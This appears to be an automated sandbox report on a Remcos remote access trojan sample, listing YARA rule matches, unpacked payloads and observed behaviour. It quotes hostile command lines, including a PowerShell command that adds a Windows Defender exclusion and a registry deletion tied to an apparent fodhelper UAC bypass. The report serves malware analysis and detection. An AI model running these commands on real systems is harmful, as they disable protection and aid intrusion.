Source: 34.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 34.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 33.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 20.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 34.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 34.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 34.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 34.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 34.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 34.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 20.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 33.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 33.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 33.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Wscript starts Powershell (via cmd or directly)Show sources
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\cde.bat' 'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Htdr Jump to behavior
Contains functionality to call native functionsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_10544F6C NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,20_2_10544F6C
Contains functionality to shutdown / reboot the systemShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai20_2_0040D1E8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_1053F6ED atoi,atoi,atoi,ExitWindowsEx,LoadLibraryA,GetProcAddress,20_2_1053F6ED
Creates files inside the system directoryShow sources
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows Jump to behavior
Deletes files inside the Windows folderShow sources
Source: C:\Windows\System32\cmd.exeFile deleted: C:\Windows \System32Jump to behavior
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\readme.exeCode function: 0_2_0045AD280_2_0045AD28
Source: C:\Windows \System32\fodhelper.exeCode function: 10_2_00007FF6CFED1D7410_2_00007FF6CFED1D74
Source: C:\Windows \System32\fodhelper.exeCode function: 10_2_00007FF6CFED3B3010_2_00007FF6CFED3B30
Source: C:\Windows \System32\fodhelper.exeCode function: 10_2_00007FF6CFED552C10_2_00007FF6CFED552C
Source: C:\Windows \System32\fodhelper.exeCode function: 10_2_00007FF6CFED2F1010_2_00007FF6CFED2F10
Source: C:\Windows \System32\fodhelper.exeCode function: 10_2_00007FF6CFED130C10_2_00007FF6CFED130C
Source: C:\Windows \System32\fodhelper.exeCode function: 10_2_00007FF6CFED51A410_2_00007FF6CFED51A4
Source: C:\Windows \System32\fodhelper.exeCode function: 10_2_00007FF6CFED32A010_2_00007FF6CFED32A0
Source: C:\Windows \System32\fodhelper.exeCode function: 10_2_00007FF6CFED759410_2_00007FF6CFED7594
Source: C:\Windows \System32\fodhelper.exeCode function: 10_2_00007FF6CFED718C10_2_00007FF6CFED718C
Source: C:\Windows \System32\fodhelper.exeCode function: 10_2_00007FF6CFED4C7410_2_00007FF6CFED4C74
Source: C:\Windows \System32\fodhelper.exeCode function: 10_2_00007FF6CFED234010_2_00007FF6CFED2340
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0040D1E820_2_0040D1E8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_105310A720_2_105310A7
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_0045AD2821_2_0045AD28
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 21_2_0040215021_2_00402150
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_0045AD2829_2_0045AD28
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_0040215029_2_00402150
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_0043EBB029_2_0043EBB0
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: 29_2_029220E429_2_029220E4
Found potential string decryption / allocating functionsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 1054519E appears 47 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 00413956 appears 47 times
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: String function: 00403ECC appears 33 times
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: String function: 00406A20 appears 65 times
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: String function: 004099FC appears 77 times
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: String function: 0040492C appears 96 times
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeCode function: String function: 02924A04 appears 59 times
PE file contains more sections than normalShow sources
Source: propsys.dll.8.drStatic PE information: Number of sections : 19 > 10
PE file contains strange resourcesShow sources
Source: readme.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Htdrset.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: readme.exe, 00000000.00000002.667484053.0000000002330000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs readme.exe
Source: readme.exe, 00000000.00000002.672622168.0000000002A40000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs readme.exe
Source: readme.exe, 00000000.00000002.675597032.00000000048E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameFodHelper.EXEj% vs readme.exe
Source: readme.exe, 00000000.00000002.667495590.0000000002340000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs readme.exe
Source: readme.exe, 00000000.00000002.672693367.0000000002B90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs readme.exe
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Uses reg.exe to modify the Windows registryShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Yara signature matchShow sources
Source: 0000001D.00000003.696464446.0000000004484000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000000.00000002.672807932.0000000002CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000022.00000002.720967567.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000022.00000002.720967567.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000014.00000002.1021865759.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000014.00000002.1021865759.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000015.00000003.714523089.00000000006FA000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000015.00000003.670638427.0000000004544000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000014.00000002.1018532568.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000014.00000002.1018532568.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000015.00000002.719648979.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 0000001D.00000002.722815102.0000000002720000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000000.00000003.608868353.0000000004564000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 0000001D.00000003.717391544.000000000064F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 0000001D.00000003.717525769.000000000064F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000015.00000002.716511670.00000000006FA000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000015.00000003.714157968.00000000006FA000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 0000001D.00000003.696287311.0000000004404000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000021.00000002.714674742.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000021.00000002.714674742.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000000.00000003.609002183.00000000045E4000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 0000001D.00000002.719190020.000000000064F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000021.00000002.718308265.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000021.00000002.718308265.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000022.00000002.717758224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000022.00000002.717758224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000015.00000003.670834487.00000000045C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: Process Memory Space: readme.exe PID: 4288, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: Process Memory Space: Htdrset.exe PID: 4524, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: Process Memory Space: Htdrset.exe PID: 4696, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KGYEP10B\Htdr[1], type: DROPPEDMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T7L7U67X\Htdr[1], type: DROPPEDMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W2BICE6W\Htdr[1], type: DROPPEDMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 34.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 34.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 33.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 20.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 34.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 34.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 34.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 34.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 34.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 34.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 20.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
